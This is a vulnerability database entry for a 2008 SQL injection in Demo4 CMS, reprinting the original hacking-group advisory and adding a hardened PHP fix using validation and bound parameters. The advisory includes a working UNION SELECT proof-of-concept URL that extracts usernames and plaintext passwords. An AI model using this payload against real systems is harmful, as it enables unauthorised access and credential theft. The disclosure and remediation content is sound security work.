cwh_underground demo4_cms SQL Injection Vulnerability

Vulnerability ID: 1115561
Vulnerability type: SQL injection
Published: 2008-06-23
Updated: 2008-07-02
CVE ID: CVE-2008-2983
CNNVD-ID: CNNVD-200807-040
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/5914
https://www.securityfocus.com/bid/81012
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200807-040
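|Vulnerability details
Demo4CMS is a simple content management system based on MySQL and PHP. index.php in Demo4CMS 01 Beta contains a SQL injection vulnerability that lets remote attackers execute arbitrary SQL commands via the id parameter.
|Exploit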
===============================================================
  Demo4 CMS (index.php id) Remote SQL Injection Vulnerability
===============================================================
 
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 23 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : Demo4 CMS 
 VERSION     : Beta01
 VENDOR      : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/demo4
#####################################################

--- Remote SQL Injection ---

-----------------------------
 Vulnerable File [index.php]
-----------------------------

@Line

   8:  if ($_GET['id']=="")
   9:  $id = $startpage;
  10:  else
  11:  $id = $_GET['id'];
  12:  database_connect();
  13:  $query = "SELECT * from content
  14:         WHERE id = $id";
  15:  $error = mysql_error();

---------
 Exploit
---------

[+] http://[Target]/[demo4_path]/index.php?id=[SQL Injection]


   **This exploit can get username and password (No Encryption)**

-------------
 POC Exploit
-------------

[+] http://192.168.24.25/demo4/index.php?id=-9999/**/UNION/**/SELECT/**/1,userid,3,4,password,username,7,8/**/FROM/**/pages_t_users


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-23]
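
A hardened form of the `index.php` lines quoted in the advisory, as an added example that is not part of the advisory or of Demo4 CMS: the `id` value is validated as a positive integer and bound as a parameter instead of being concatenated into the query. The in-memory SQLite table, its rows, the start page value 1 and the function names `resolve_page_id` and `load_page` are assumptions made so the example runs offline (the application itself uses MySQL).

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the CMS database so the example runs offline.
// Requires the pdo_sqlite extension; the real application uses MySQL.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$pdo->exec("INSERT INTO content VALUES (1, 'Home', 'Welcome'), (2, 'About', 'About us')");

// Hardened form of index.php lines 8-15: start page when id is absent or empty,
// null when id is not a positive integer, otherwise the validated integer.
function resolve_page_id(array $get, int $startpage): ?int
{
    if (!isset($get['id']) || $get['id'] === '') {
        return $startpage;
    }
    // Reject array input (?id[]=1) before it reaches the integer filter.
    if (!is_string($get['id'])) {
        return null;
    }
    $id = filter_var($get['id'], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Fetches one content row with the id bound as an integer parameter.
function load_page(PDO $pdo, int $id): ?array
{
    $stmt = $pdo->prepare('SELECT id, title, body FROM content WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed requests; the last value is the id from the advisory's PoC URL.
$requests = [
    [],
    ['id' => '2'],
    ['id' => ['2']],
    ['id' => '-9999/**/UNION/**/SELECT/**/1,userid,3,4,password,username,7,8/**/FROM/**/pages_t_users'],
];
foreach ($requests as $get) {
    $id = resolve_page_id($get, 1);
    $page = $id === null ? null : load_page($pdo, $id);
    echo json_encode($get), ' => ', $page === null ? '404 Not Found' : $page['title'], PHP_EOL;
}
```

Validation and parameter binding are independent layers here: the bound statement keeps the query structure fixed even if a later change loosens the input check.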
|Affected products
Cwh Underground Demo4 Cms 01 Beta
|References

Source: XF
Name: demo4cms-index-sql-injection(43291)
Link: http://xforce.iss.net/xforce/xfdb/43291
Source: MILW0RM
Name: 5914
Link: http://www.milw0rm.com/exploits/5914